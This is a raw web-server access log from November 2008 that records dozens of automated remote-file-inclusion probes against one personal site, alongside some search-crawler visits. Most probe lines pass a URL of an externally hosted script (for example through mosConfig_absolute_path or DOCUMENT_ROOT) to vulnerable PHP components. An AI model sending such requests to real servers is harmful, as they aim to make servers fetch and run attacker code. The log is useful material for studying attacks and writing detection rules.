87.106.243.160 - - [04/Nov/2008:09:38:59 -0800] "GET /?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 200 94851 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:39:09 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:39:09 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:39:17 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.250.2.28 - - [04/Nov/2008:09:39:29 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:39:32 -0800] "GET /logs/scripts.log//tools/errors.php?error=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:39:32 -0800] "GET /logs//tools/errors.php?error=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:39:32 -0800] "GET /tools/errors.php?error=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:40:07 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:40:08 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:40:09 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:40:12 -0800] "GET /logs/access_080828.log/errors.php?error=http://gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:40:12 -0800] "GET /errors.php?error=http://gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:40:12 -0800] "GET /logs/errors.php?error=http://gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:09:40:22 -0800] "GET /logs/access_071222.log HTTP/1.0" 200 103077 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:09:40:32 -0800] "GET /logs//tools/errors.php?error=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:09:40:32 -0800] "GET /tools/errors.php?error=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:09:40:32 -0800] "GET /logs/scripts.log//tools/errors.php?error=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:09:40:39 -0800] "GET /mambots/content/multithumb/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:09:40:39 -0800] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:40:58 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:09:40:58 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:41:12 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:41:15 -0800] "GET /logs/access_081002.log/errors.php?error=http://gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:09:41:45 -0800] "GET /bikes/WeSTOC08/ HTTP/1.1" 200 848 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:09:42:14 -0800] "GET /tools/errors.php?error=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:09:42:14 -0800] "GET /logs//tools/errors.php?error=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.250.2.28 - - [04/Nov/2008:09:42:15 -0800] "GET /logs/access_081015.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:42:36 -0800] "GET /logs/access_080903.log//lib/language.php?_LIB_DIR=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:42:36 -0800] "GET /lib/language.php?_LIB_DIR=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:42:37 -0800] "GET /logs//lib/language.php?_LIB_DIR=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:42:41 -0800] "GET /logs/access_080525.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:42:41 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:42:42 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.43 - - [04/Nov/2008:09:42:43 -0800] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:42:48 -0800] "GET /logs/access_080403.log//lib/language.php?_LIB_DIR=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.43 - - [04/Nov/2008:09:43:05 -0800] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:06 -0800] "GET /logs/access_080416.log/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:06 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:07 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:10 -0800] "GET /logs/access_080416.log/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:10 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:10 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:29 -0800] "GET /logs/access_080116.log/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:43:30 -0800] "GET /logs/access_080116.log/administrator/components/com_googlebase/admin.googlebase.phphttp://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:43:34 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:09:43:35 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:09:44:21 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:09:44:21 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:09:44:40 -0800] "GET /logs/access_080424.log HTTP/1.0" 200 2689415 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:09:45:31 -0800] "GET /?show=slide&pageid=169&nggpage=3 HTTP/1.1" 200 157712 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:45:33 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:45:33 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:09:46:37 -0800] "GET /logs/access_080824.log/errors.php?error=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:09:46:37 -0800] "GET /errors.php?error=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:09:46:38 -0800] "GET /logs/errors.php?error=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:09:46:50 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.119.182.54 - - [04/Nov/2008:09:46:55 -0800] "GET /logs/access_080916.log/errors.php?error=http://gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:47:01 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:47:01 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.146.26.91 - - [04/Nov/2008:09:48:03 -0800] "GET /logs/index.php?incl=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.26.91 - - [04/Nov/2008:09:48:05 -0800] "GET /index.php?incl=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 200 94688 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:48:46 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:48:46 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:49:05 -0800] "GET /logs/protection.php?action=logout&siteurl=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:09:49:05 -0800] "GET /protection.php?action=logout&siteurl=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:49:25 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:09:49:25 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:49:38 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:49:38 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:49:52 -0800] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:49:53 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:50:03 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:50:19 -0800] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:50:20 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:50:20 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:35 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:35 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:40 -0800] "GET /logs/protection.php?action=logout&siteurl=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:40 -0800] "GET /protection.php?action=logout&siteurl=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:47 -0800] "GET /send_reminders.php?includedir=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:09:50:47 -0800] "GET /logs/send_reminders.php?includedir=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:51:25 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:52:48 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:52:48 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:52:53 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.68.20 - - [04/Nov/2008:09:52:59 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:53:03 -0800] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:53:03 -0800] "GET /logs///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.21.68.20 - - [04/Nov/2008:09:53:04 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:53:05 -0800] "GET /logs/access_081020.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:09 -0800] "GET /logs/access_080909.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:53:24 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:53:24 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:36 -0800] "GET /logs/access_080727.log/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:36 -0800] "GET /logs/access_080727.log/index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:38 -0800] "GET /index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 200 94660 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:38 -0800] "GET /index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 200 94681 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:40 -0800] "GET /logs/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:09:53:40 -0800] "GET /logs/index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:53:44 -0800] "GET /logs/access_081018.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:49 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:49 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:49 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:53 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:53 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:53:53 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [04/Nov/2008:09:54:09 -0800] "GET /logs/access_081026.log///kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:54:09 -0800] "GET /logs/access_080909.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:09:54:13 -0800] "GET /logs/access_080909.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.247.43.5 - - [04/Nov/2008:09:54:20 -0800] "GET /logs/access_080216.log//com_expose&Itemid=//////////?mosConfig_absolute_path=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
